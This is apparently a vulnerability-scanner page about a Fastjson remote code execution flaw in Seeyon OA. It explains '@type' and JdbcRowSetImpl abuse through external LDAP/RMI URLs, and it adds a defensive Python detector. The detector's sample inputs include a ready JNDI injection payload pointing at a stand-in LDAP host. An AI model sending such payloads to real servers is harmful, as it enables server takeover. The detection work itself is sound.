Seeyon OA Fastjson Remote Code Execution Scanner
Detects 'Remote Code Execution' vulnerability in Seeyon OA Fastjson component.
Short Info
Level: Critical
Single Scan: Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 2 weeks 3 hours
Scan only one: Domain, IPv4, Subdomain
Toolbox: -
Seeyon OA is a popular office automation software widely utilized in corporate environments to streamline internal workflows and communications. Developed by Seeyon, it serves enterprises seeking effective management solutions for their daily office tasks, improving efficiency in handling documents and communication. Often deployed in larger organizations, Seeyon OA caters to both administrative and operational needs by providing tools for task management, message handling, and organizational communication. The software integrates various modules to ensure cohesive operation within a business framework. Its main users include different levels of staff within corporate settings who rely on the software for task orchestration and communication facilitation. Users appreciate the platform for its comprehensive feature set, designed to optimize organizational processes.
The Remote Code Execution vulnerability in Seeyon OA, reached through its Fastjson component, is critical: it lets attackers execute code of their choosing on the server. The flaw arises from how the Fastjson library processes data, accepting user-supplied input without stringent validation. Because of Fastjson's templating and data-handling methods, unvalidated input can lead to arbitrary code execution. Attackers exploit this with specific payloads that inject harmful instructions into the execution flow. A successful exploit can grant unauthorized control of the server, posing a significant threat to its integrity, and the vulnerability can serve as a gateway for more severe breaches.
Technically, the vulnerability is triggered by HTTP POST requests carrying specially crafted JSON payloads that contain certain "@type" references. These references name underlying Java classes, such as JdbcRowSetImpl, and allow malicious operations via external LDAP URLs. A crucial aspect of the vulnerability is its reliance on misconfigured rmi/ldap services, which the manipulated JSON payloads sent to specific endpoints cause the server to contact. The scanner's matchers verify successful exploitation by checking for Fastjson-related exceptions in responses and for out-of-band DNS interactions with external links. Attackers leverage this to execute arbitrary commands on compromised systems. The presence of those exceptions or certain strings in responses confirms successful exploitation.
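As an added example (not part of this scanner page, nor code from Seeyon or the Fastjson project), the following Python inspector flags the indicators the description names from a defender's side: an "@type" key anywhere in an untrusted JSON body, ldap:// or rmi:// URL values, and Fastjson exception text in a server response. The sample bodies, the IP addresses and the key name carrying the URL are constructed for the demonstration.

```python
import json
import re

# JNDI URL schemes named on the page (ldap/rmi); matched at the start of any string value.
JNDI_URL = re.compile(r'^\s*(ldap|ldaps|rmi)://', re.IGNORECASE)

# Strings a Fastjson stack trace or autoType refusal leaves in an HTTP response.
FASTJSON_ERROR_MARKERS = ("com.alibaba.fastjson.JSONException", "autoType is not support")

# Constructed sample inputs (not captured from a real system).
SAMPLE_REQUESTS = {
    "benign": '{"name":"report.docx","size":1024}',
    "typed":  '{"@type":"com.sun.rowset.JdbcRowSetImpl","source":"ldap://203.0.113.9:1389/x"}',
    "nested": '{"items":[{"note":"ok"},{"note":"rmi://203.0.113.9/x"}]}',
}
SAMPLE_RESPONSE = (
    "HTTP/1.1 500\r\n\r\ncom.alibaba.fastjson.JSONException: "
    "autoType is not support. com.sun.rowset.JdbcRowSetImpl"
)


def find_indicators(body: str) -> list[str]:
    """Return human-readable reasons a JSON request body looks like Fastjson @type abuse.

    Any '@type' key in client-supplied JSON is suspicious on its own (clients should not
    pick the server-side class); a JNDI-style URL value is an independent second signal.
    Non-JSON bodies yield no indicators so the caller can fall through to other checks.
    """
    try:
        doc = json.loads(body)
    except ValueError:
        return []
    reasons: list[str] = []

    def walk(node, path):
        if isinstance(node, dict):
            for key, value in node.items():
                if key == "@type":
                    reasons.append(f"@type at {path or '$'} -> {value}")
                walk(value, f"{path}.{key}")
        elif isinstance(node, list):
            for i, item in enumerate(node):
                walk(item, f"{path}[{i}]")
        elif isinstance(node, str) and JNDI_URL.match(node):
            reasons.append(f"JNDI URL at {path}: {node}")

    walk(doc, "")
    return reasons


def response_leaks_fastjson(response_text: str) -> bool:
    """True when a response carries a Fastjson exception: the kind of marker the
    scanner's matchers look for, and a sign the parser is reachable from outside."""
    return any(marker in response_text for marker in FASTJSON_ERROR_MARKERS)
```

Run over a WAF or proxy log, a non-empty result from find_indicators is worth an alert regardless of whether the response showed an exception, since the out-of-band DNS/LDAP callback is the part that does not appear in the HTTP reply.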
The potential effects of exploiting this vulnerability are significant, as it can lead to full compromise of the affected server. Attackers can execute arbitrary commands, potentially installing malware, extracting sensitive data, or creating backdoors for persistent access. Such infiltrations undermine organizational security, risking data confidentiality, integrity, and availability. This vulnerability can also facilitate lateral movement within the network, potentially affecting other systems and services connected to Seeyon OA. Additionally, attackers might use exploited servers to launch further attacks on external systems or exfiltrate sensitive information, leveraging the compromised server as a pivot point.